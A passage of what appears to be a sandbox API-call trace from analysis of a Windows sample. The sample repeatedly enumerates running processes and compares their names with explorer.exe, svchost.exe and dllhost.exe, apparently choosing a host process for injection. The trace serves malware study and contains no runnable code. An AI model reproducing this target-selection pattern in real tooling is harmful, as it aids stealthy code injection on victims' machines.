[0208.040] CloseHandle (hObject=0xec) returned 1 [0208.040] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0208.040] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0208.040] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0208.040] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0208.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0208.040] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.040] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.040] CloseHandle (hObject=0xec) returned 1 [0208.040] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0208.040] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0208.040] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0208.040] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0208.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0208.041] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.041] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.041] CloseHandle (hObject=0xec) returned 1 [0208.041] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0208.041] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0208.041] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0208.041] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0208.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0208.042] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.042] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.042] CloseHandle (hObject=0xec) returned 1 [0208.042] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0208.042] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0208.042] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0208.042] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0208.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0208.042] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.042] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.042] CloseHandle (hObject=0xec) returned 1 [0208.042] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0208.042] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0208.042] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0208.043] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0208.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0208.043] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.043] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.043] CloseHandle (hObject=0xec) returned 1 [0208.043] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0208.043] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0208.043] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0208.043] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0208.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0208.044] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.044] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.044] CloseHandle (hObject=0xec) returned 1 [0208.044] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0208.044] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0208.044] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0208.044] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0208.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0208.044] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.044] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.044] CloseHandle (hObject=0xec) returned 1 [0208.044] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0208.045] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0208.045] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0208.045] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0208.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0208.045] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.045] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.045] CloseHandle (hObject=0xec) returned 1 [0208.045] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0208.045] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0208.045] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0208.045] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0208.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0208.046] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.046] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.046] CloseHandle (hObject=0xec) returned 1 [0208.046] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0208.046] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0208.046] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0208.046] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0208.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0208.046] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.046] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.046] CloseHandle (hObject=0xec) returned 1 [0208.046] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0208.047] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0208.047] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0208.047] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0208.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0208.047] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.047] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.047] CloseHandle (hObject=0xec) returned 1 [0208.047] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0208.047] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0208.047] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0208.047] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0208.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0208.048] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.048] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.048] CloseHandle (hObject=0xec) returned 1 [0208.048] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0208.048] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0208.048] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0208.048] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0208.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0208.048] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.048] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.048] CloseHandle (hObject=0xec) returned 1 [0208.048] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0208.049] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0208.049] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0208.049] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0208.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0208.049] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.049] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.049] CloseHandle (hObject=0xec) returned 1 [0208.049] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0208.049] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0208.049] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0208.049] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0208.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0208.050] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.050] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.050] CloseHandle (hObject=0xec) returned 1 [0208.050] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0208.050] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0208.050] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0208.050] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0208.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0208.050] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.050] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.051] CloseHandle (hObject=0xec) returned 1 [0208.051] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0208.051] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0208.051] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0208.051] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0208.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0208.051] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.051] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.051] CloseHandle (hObject=0xec) returned 1 [0208.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0208.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0208.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0208.051] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0208.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0208.052] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.052] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.052] CloseHandle (hObject=0xec) returned 1 [0208.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0208.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0208.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0208.052] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0208.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0208.053] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.053] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.053] CloseHandle (hObject=0xec) returned 1 [0208.053] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0208.053] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0208.053] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0208.053] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0208.053] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0208.054] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0208.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0208.054] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0208.055] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0208.055] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0208.056] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0208.056] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.056] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.056] CloseHandle (hObject=0xec) returned 1 [0208.056] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0208.057] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.057] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.057] CloseHandle (hObject=0xec) returned 1 [0208.057] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0208.057] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0208.058] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.058] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.058] CloseHandle (hObject=0xec) returned 1 [0208.058] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0208.058] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0208.058] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.058] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.059] CloseHandle (hObject=0xec) returned 1 [0208.059] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.059] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0208.060] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.060] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.060] CloseHandle (hObject=0xec) returned 1 [0208.060] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0208.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0208.060] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.060] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.060] CloseHandle (hObject=0xec) returned 1 [0208.060] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0208.060] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0208.060] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0208.060] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0208.061] CloseHandle (hObject=0xe8) returned 1 [0208.061] Sleep (dwMilliseconds=0x3e8) [0209.158] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0209.160] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0209.161] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: 